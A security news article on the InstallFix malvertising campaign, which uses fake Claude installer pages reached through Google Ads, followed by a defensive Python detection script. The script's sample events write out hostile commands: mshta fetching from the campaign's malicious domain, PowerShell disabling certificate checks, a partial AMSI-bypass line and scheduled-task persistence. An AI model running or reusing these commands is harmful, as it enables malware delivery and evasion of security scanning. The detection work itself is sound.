InstallFix Campaign Uses Fake Claude AI Installers to Distribute Malware via Google Ads
Trend Micro exposes the InstallFix campaign, in which threat actors use fake Claude AI installer pages promoted through Google Ads to deliver malware that disables security features and establishes persistent access.

Trend Micro researchers have detailed a sophisticated malware campaign dubbed InstallFix, which weaponizes trust in Anthropic's popular Claude AI assistant. The campaign, also referred to as the Fake Claude Installer threat, uses meticulously crafted fake installation pages promoted through Google Ads to trick users into running malicious payloads that collect system information, disable security features, and establish persistent command-and-control (C2) access.
The attack chain begins when users search for terms such as "Claude Code" or "Claude Code install" and click on a sponsored result at the top of Google's results page. The fraudulent landing page presents realistic, OS-specific installation instructions that tell the user to copy a command and run it. For Windows, the command is a PowerShell one-liner that invokes mshta.exe to download and execute a payload from the known malicious domain download-version[.]1-5-8[.]com. For macOS, an equivalent command is shown. The page's download buttons are deliberately non-functional, which nudges the user toward copying and running the presented command instead.
Once executed, the deobfuscated PowerShell code performs several actions. It generates a unique victim identifier so that the operators can track individual infections, disables TLS certificate validation so that any HTTPS certificate is accepted (which lets the script fetch from attacker-controlled servers regardless of what certificate they present), decrypts hidden strings, and attempts to tamper with internal .NET behavior, most likely as a security bypass. The payload then downloads additional malware from attacker-controlled servers. Trend Micro's telemetry confirmed the creation of scheduled tasks for persistence and outbound connections to C2 infrastructure.
The campaign employs several evasion techniques, including an AMSI bypass to keep the PowerShell script from being scanned, and it assigns each victim a unique C2 URL, so blocking or hunting on the URL recovered from one infection does not cover the others, complicating both detection and remediation. The researchers noted that the malvertising URLs mimic legitimate Google Ads link structures, with parameters such as `gar_source` and `gad_campaign` resembling real advertising tracking fields, which makes them hard for users to distinguish from genuine promotions.
Trend Micro's telemetry from TrendAI Vision One identified attacks against organizations across the Americas, Asia Pacific, Middle East, and Africa (AMEA), and Europe. Victims have been confirmed in Malaysia, the Netherlands, Thailand, and the United States, spanning government, electronics, education, and food and beverage. This broad spread suggests opportunistic, indiscriminate targeting aimed at credential and data theft rather than a focus on any single vertical.
The InstallFix campaign highlights the growing risk of social engineering attacks that exploit the popularity of AI tools. As modern software installation increasingly involves copying and running commands (such as curl-to-bash), attackers take advantage of this behavior to distribute malware. Trend Micro warns that both developers and non-technical users are at risk, as command-line tools have become common among a wide range of professionals.
Organizations are advised to avoid sponsored search results when looking for AI tooling and to navigate directly to the vendor's documented installation page instead, to verify the domain of any installation page before running a copy-paste command, and to tune endpoint detection and response (EDR) rules for the behaviors seen here: mshta.exe invoked with a remote URL, PowerShell that disables certificate validation or tampers with AMSI, and scheduled-task creation spawned from such a session. The researchers emphasize that understanding these deceptive tactics is critical as enterprises rush to integrate AI capabilities into their workflows.
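The detection advice above, and the execution chain described earlier (mshta.exe fetching from the named domain, PowerShell disabling certificate validation and tampering with AMSI, scheduled-task persistence), can be turned into a small triage rule set. The following is an added example written for this page, not code from Trend Micro or from the campaign. The event field names mimic a Sysmon or EDR process-creation record, the sample events are constructed, and the AMSI indicator strings are generic public ones, not the campaign's exact bypass; all of these are assumptions.

```python
"""Score process-creation events for the InstallFix behaviours described in the
Trend Micro write-up. Added example: field names, thresholds, sample events and
the AMSI indicator strings are assumptions, not artifacts from the report."""
import re
from collections import defaultdict

# Domain named in the report (defanged there as download-version[.]1-5-8[.]com).
KNOWN_BAD_DOMAINS = {"download-version.1-5-8.com"}

REMOTE_URL = re.compile(r"https?://[^\s'\"]+", re.I)


def mshta_remote(ev):
    """mshta.exe handed a remote URL is a download-and-execute cradle, not a local .hta."""
    return ev["image"].lower().endswith("mshta.exe") and bool(REMOTE_URL.search(ev["cmdline"]))


def ps_cert_bypass(ev):
    """PowerShell switching off TLS certificate validation, as the deobfuscated payload does."""
    return "powershell" in ev["image"].lower() and bool(
        re.search(r"ServerCertificateValidationCallback|SkipCertificateCheck", ev["cmdline"], re.I))


def ps_amsi_tamper(ev):
    """Generic AMSI-tampering strings (assumption: common indicators, not this campaign's bypass)."""
    return "powershell" in ev["image"].lower() and bool(
        re.search(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer", ev["cmdline"], re.I))


def schtasks_from_ps(ev):
    """Scheduled task created by a PowerShell parent: the persistence step seen in telemetry."""
    return (ev["image"].lower().endswith("schtasks.exe")
            and "/create" in ev["cmdline"].lower()
            and "powershell" in ev["parent"].lower())


def known_bad_domain(ev):
    return any(d in ev["cmdline"].lower() for d in KNOWN_BAD_DOMAINS)


RULES = {
    "mshta_remote_url": mshta_remote,
    "ps_tls_validation_disabled": ps_cert_bypass,
    "ps_amsi_tamper": ps_amsi_tamper,
    "schtasks_persistence": schtasks_from_ps,
    "known_bad_domain": known_bad_domain,
}


def triage(events, min_hits=2):
    """Return {host: sorted rule names} for hosts worth escalating.
    A hit on the known-bad domain escalates on its own; otherwise require
    min_hits distinct rules, so a lone admin running schtasks does not page anyone."""
    hits = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev["host"]].add(name)
    return {h: sorted(r) for h, r in hits.items()
            if "known_bad_domain" in r or len(r) >= min_hits}


# Constructed sample events (not real telemetry). WS-01 mirrors the described chain;
# WS-02 is ordinary admin activity that should stay quiet.
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Windows\System32\mshta.exe", "parent": "powershell.exe",
     "cmdline": "mshta.exe https://download-version.1-5-8.com/setup"},
    {"host": "WS-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "mshta.exe",
     "cmdline": "powershell -nop -w hidden -c \"[Net.ServicePointManager]::"
                "ServerCertificateValidationCallback={$true}; (payload elided)\""},
    {"host": "WS-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "mshta.exe",
     "cmdline": "powershell -c \"[Ref].Assembly.GetType('System.Management.Automation."
                "AmsiUtils').GetField('amsiInitFailed','NonPublic,Static') (elided)\""},
    {"host": "WS-01", "image": r"C:\Windows\System32\schtasks.exe", "parent": "powershell.exe",
     "cmdline": "schtasks /Create /SC ONLOGON /TN Updater /TR (elided)"},
    {"host": "WS-02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "explorer.exe", "cmdline": r"powershell Get-ChildItem C:\Users"},
    {"host": "WS-02", "image": r"C:\Windows\System32\schtasks.exe", "parent": "explorer.exe",
     "cmdline": "schtasks /Create /SC DAILY /TN Backup /TR backup.cmd"},
    {"host": "WS-02", "image": r"C:\Windows\System32\mshta.exe", "parent": "cmd.exe",
     "cmdline": r"mshta.exe C:\tools\report.hta"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

The rules are deliberately behavioral rather than hash- or URL-based: because each victim receives a unique C2 URL, the only durable indicator is the chain itself (mshta.exe with a remote argument, a PowerShell child that disables certificate checks, and a scheduled task created from that session). Requiring two distinct rules per host keeps a single benign schtasks or a local .hta launch from alerting.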